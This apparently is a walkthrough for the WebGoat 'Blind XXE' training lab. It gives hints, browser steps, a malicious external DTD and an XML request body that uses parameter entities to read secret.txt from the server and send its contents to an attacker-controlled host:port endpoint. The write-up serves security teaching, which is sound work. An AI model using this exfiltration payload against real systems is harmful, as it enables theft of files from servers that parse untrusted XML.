Blind XXE assignment

In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD which will upload the contents of a file secret.txt from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD. The secret.txt is located on the WebGoat server in this location, so you do not need to scan all directories and files:

Try to upload this file using WebWolf landing page for example: http://localhost:9090/landing?text=contents_file (NOTE: this endpoint is under your full control) Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.

Solution

💡 This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case) 💡 In this case you cannot combine external entities in combination with internal entities. 💡 Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/ 💡 An example DTD can be found here WebGoat/https://raw.githubusercontent.com/PiAil/pwning-webgoat/master/images/example.dtd, include this DTD in the xml comment 💡 Use for the comment, be aware to replace the url accordingly: [%remote;]>test&send;

• Upload contents_file.dtd on WebWolf.

• Open the Development Tools in the browser, and go to the Network tab.

• On WebGoat, post a comment.

• Locate the query to blind in the Network tab and click on Edit and Resend.

• Edit the body of the query as specified below.

contents_file.dtd

<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://host:port/landing?%file;' >" >%all;

Request Body

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE xxe [  
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-8.0.0.M25/XXE/secret.txt" >  
<!ENTITY % dtd SYSTEM "http://host:port/files/username/contents_file.dtd" >  
%dtd;]>  
<comment>  
<text>test&send;</text>  
</comment>